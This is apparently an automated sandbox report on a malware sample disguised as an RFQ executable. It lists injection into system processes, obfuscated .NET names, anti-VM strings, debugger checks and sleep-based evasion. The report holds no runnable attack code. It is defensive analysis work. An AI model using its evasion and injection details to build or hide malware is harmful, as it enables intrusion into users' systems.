              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, qbCmH5zDKIPtx7xume.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'w1Zv5W3Qrt', 'psYvMKyDBP', 'puVv4JcpiI', 'xYAvxqg1g0', 'DODvHwYllT', 'QiHvv6KwXr', 'Jp0v8HGS6n'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, sDS4tmjyjBi15csXUB.cs | High entropy of concatenated method names: 'ToString', 'eax4si7DaO', 'NUO4E44t5O', 'Tny4LHVXXK', 'GCu4pxvlEE', 'dTU4hvcTcu', 'oUg4R1CxeH', 'BL54iRb8ZS', 'Xu44Y3bZpN', 'yql4eLWj11'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, sbMIneQI954nk1VNKy.cs | High entropy of concatenated method names: 'pL55o5ULq4', 'FyL5qqsoZZ', 'm5V5W9c8uC', 'FjQ5EtDbs3', 'kBZ5pumEBX', 'R7f5h6DhWS', 'mD55iCkCqF', 'y3v5YIM5CD', 'KVS5uccGlX', 'ppq5slQS24'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, vmE0k9rkQfM22hY723Q.cs | High entropy of concatenated method names: 'a1WvcTBnLA', 'hZuvFeOe6A', 'O7jvf2fqBy', 'fw6vSQQX0I', 'zeBvKUGZFT', 'q0cv20KGJo', 'vv2vJP594r', 'sKMvoAnUB1', 'iAXvqa9j5H', 'fdjvyOfi2L'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, ygnlx19tdmMWkOqBtm.cs | High entropy of concatenated method names: 'qw2x7e3Jv2', 'dojxwpsce8', 'ng5HkGKBWW', 'lpcHrYiEj4', 'G9DxsjSP0P', 'ReHxGMB5gq', 'nuXxQlLh1k', 'LigxtbZ07r', 'T2bxgrIVMq', 'bg4xji458v'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, YHv3HB71eXHZqYirID.cs | High entropy of concatenated method names: 'JLSHPNt0AG', 'ksCHlO9S5g', 'yAGHC8n9eT', 'r46HbxU2v9', 'VepHU3qXUE', 'LysHNG0HFY', 'DswHVTvEPY', 'B0cHAecVgG', 'xoXHTjSAI0', 'Io0HOvL0vT'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, Uh4F0ve7bQdwBRgsoB.cs | High entropy of concatenated method names: 'jJDNcK4XH8', 'lEuNFEMX4Q', 'Qw7NfStig0', 'cC3NSpeDQu', 'PYxNKb7fgR', 'KnXN2nOAG1', 'Dj7NJFqTmT', 'KU2NoqCDj9', 'IPtNqpoOhO', 'mgsNyY0XKp'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, t2wfK1wyNnpsQcBKtw.cs | High entropy of concatenated method names: 'e6jvrlGYxB', 'CQFvBHnQvo', 'P2jvmDiask', 'UlfvPIUZfX', 'CUPvlFLeo0', 'k0QvbKS1gE', 'eJPvUrPkoQ', 'NnwHdmsMAV', 'kwmH7yioSo', 'aFXHD5heZr'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, DqCNrv6DAiDtWMEe1X.cs | High entropy of concatenated method names: 'vhMfnsAw8', 'EbQSDmakD', 'H632Jkh0f', 'RSIJ61DnN', 'Xpjq5ZKFy', 'lUmym00Ti', 'rWa3N7gX5eUqmJAE7v', 'yWqUuddxMFfjCAVjHg', 'SYSHvTO7x', 'DPA8j8wUW'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, QdSQaLrBM9tVlJO1y9W.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HZo8tIZSm6', 'el78gCbYc3', 'bjR8jXLwTW', 'X0Z8a6eLFe', 'Bn780lJLbr', 'DUe89kN1Yl', 'Msk8duIYu0'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, piyy79lLiM1rUZW8Yn.cs | High entropy of concatenated method names: 'Dispose', 'NyWrDxMrcT', 'Mc56EHugMT', 'Umd11PXVL4', 'FDHrwv3HB1', 'NXHrzZqYir', 'ProcessDialogKey', 'wDa6kdDFQh', 'eWh6r6Q9Q2', 'IqO6612wfK'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, BUK7GIrrZ35JJ62Dy5Z.cs | High entropy of concatenated method names: 'ToString', 'YTF8BPZSnM', 'I3J8mCuXk2', 'Bvh8XAv28G', 'dvs8PWIOyN', 'GDk8lYYcNN', 'ba58Cayc5b', 'FwP8b90qVy', 'XZsJYHGCC3Ji2JMmL8b', 'aNoKadG3oEsN6R9NQYL'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, OoaFmctcsvJ1Rdaqec.cs | High entropy of concatenated method names: 'vLsMu2dZ0Z', 'C3rMGp9Mf5', 'UJTMtLUaYO', 'Kh2MgVOvbX', 'cZRMENo0hp', 'dR8MLBQIls', 'LjqMpetHAu', 'lSpMhZqjQQ', 'U7yMRVpf2x', 'P6IMiPPwWN'
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack | High entropy of concatenated method names: identical to the 20 class/method-name listings reported for 11.2.xl9lsbb.exe.d240000.7.raw.unpack above (JIXbT6WQgGNnNM192M.cs through OoaFmctcsvJ1Rdaqec.cs), i.e. the same unpacked assembly found at a second address in process 11
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack | High entropy of concatenated method names: identical to the 20 class/method-name listings reported for 11.2.xl9lsbb.exe.d240000.7.raw.unpack above (JIXbT6WQgGNnNM192M.cs through OoaFmctcsvJ1Rdaqec.cs), i.e. the same unpacked assembly found at a third address in process 11
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exe
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E933C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: xl9lsbb.exe PID: 5268, type: MEMORYSTR
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | API/Special instruction interceptor: Address: E53214
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\runonce.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 1080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 2A80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 29A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 7DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 8DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 8FA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 7450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: 9FA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: AFA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: BFA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: D300000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: E300000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: F300000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Memory allocated: FA00000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E rdtsc
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Window / User API: threadDelayed 4806
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Window / User API: threadDelayed 5166
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-100174
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | API coverage: 4.7 %
              Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API coverage: 2.6 %
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912 | Thread sleep count: 4806 > 30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912 | Thread sleep time: -9612000s >= -30000s
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912 | Thread sleep count: 5166 > 30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3912 | Thread sleep time: -10332000s >= -30000s
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120 | Thread sleep time: -75000s >= -30000s
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120 | Thread sleep time: -36000s >= -30000s
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe TID: 2120 | Thread sleep count: 36 > 30
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe TID: 3864 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\runonce.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDC93C FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FBBBE0 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Thread delayed: delay time: 922337203685477
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102814338.000000000073F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
              Source: RMActivate_ssp.exe, 00000003.00000002.4108280270.000000000816B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWAnjE
              Source: RMActivate_ssp.exe, 00000003.00000002.4108280270.000000000816B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: runonce.exe, 0000000F.00000002.4101900693.000000000092A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.3942074178.0000018E42D1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000008.00000002.2032010505.000001D7FD8EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4104201295.000000000165F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | API call chain: ExitProcess graph end node | graph_0-97375
              Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\runonce.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E rdtsc
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025175B3 LdrLoadDll
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EE41FD BlockInput
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EA5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EEC304 LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E534E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E53480 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E51E70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300625D mov eax, dword ptr fs:[00000030h]1_2_0300625D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030062D6 mov eax, dword ptr fs:[00000030h]1_2_030062D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
